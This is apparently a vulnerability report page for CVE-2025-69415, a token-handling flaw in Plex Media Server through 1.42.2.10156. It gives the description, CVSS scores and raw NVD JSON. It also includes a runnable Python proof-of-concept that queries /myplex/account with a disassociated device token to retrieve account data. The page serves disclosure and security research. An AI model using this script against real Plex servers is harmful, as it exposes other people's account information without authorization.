Security Vulnerability Report
中文
CVE-2025-69415 CVSS 7.1 HIGH

CVE-2025-69415

Published: 2026-01-02 17:16:24
Last Modified: 2026-02-27 15:27:18

Description

In Plex Media Server (PMS) through 1.42.2.10156, ability to access /myplex/account with a device token is not properly aligned with whether the device is currently associated with an account.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:plex:media_server:*:*:*:*:*:*:*:* - VULNERABLE
Plex Media Server <= 1.42.2.10156

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-69415 PoC - Plex Media Server Device Token Account Access This PoC demonstrates accessing /myplex/account with a device token after the device has been disassociated from the account. """ import requests import json import sys def exploit_plex_cve_2025_69415(plex_url, device_token): """ Attempt to access /myplex/account with device token after device has been disassociated from account. Args: plex_url: Base URL of Plex Media Server device_token: Valid device token (even if device is disassociated) Returns: dict: Response data or error information """ headers = { 'X-Plex-Device-Token': device_token, 'X-Plex-Product': 'PlexMediaServer', 'X-Plex-Version': '1.42.2.10156', 'Accept': 'application/json' } target_endpoint = f"{plex_url}/myplex/account" try: response = requests.get(target_endpoint, headers=headers, timeout=10) if response.status_code == 200: print("[+] SUCCESS: Account information accessible!") print(f"[+] Status Code: {response.status_code}") try: data = response.json() return { 'vulnerable': True, 'status_code': response.status_code, 'data': data } except: return { 'vulnerable': True, 'status_code': response.status_code, 'data': response.text } else: print(f"[-] FAILED: Status Code {response.status_code}") return { 'vulnerable': False, 'status_code': response.status_code } except requests.exceptions.RequestException as e: print(f"[-] ERROR: {str(e)}") return {'error': str(e)} if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python3 {sys.argv[0]} <plex_url> <device_token>") print("Example: python3 CVE-2025-69415.py http://192.168.1.100:32400 abc123token") sys.exit(1) plex_url = sys.argv[1] device_token = sys.argv[2] result = exploit_plex_cve_2025_69415(plex_url, device_token) print(json.dumps(result, indent=2))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69415", "sourceIdentifier": "[email protected]", "published": "2026-01-02T17:16:23.887", "lastModified": "2026-02-27T15:27:18.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Plex Media Server (PMS) through 1.42.2.10156, ability to access /myplex/account with a device token is not properly aligned with whether the device is currently associated with an account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-672"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:plex:media_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.42.2.10156", "matchCriteriaId": "7A4BA6A5-E87A-497B-85EE-F2EEA90B8740"}]}]}], "references": [{"url": "https://github.com/lufinkey/vulnerability-research/blob/main/CVE-2025-34158/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}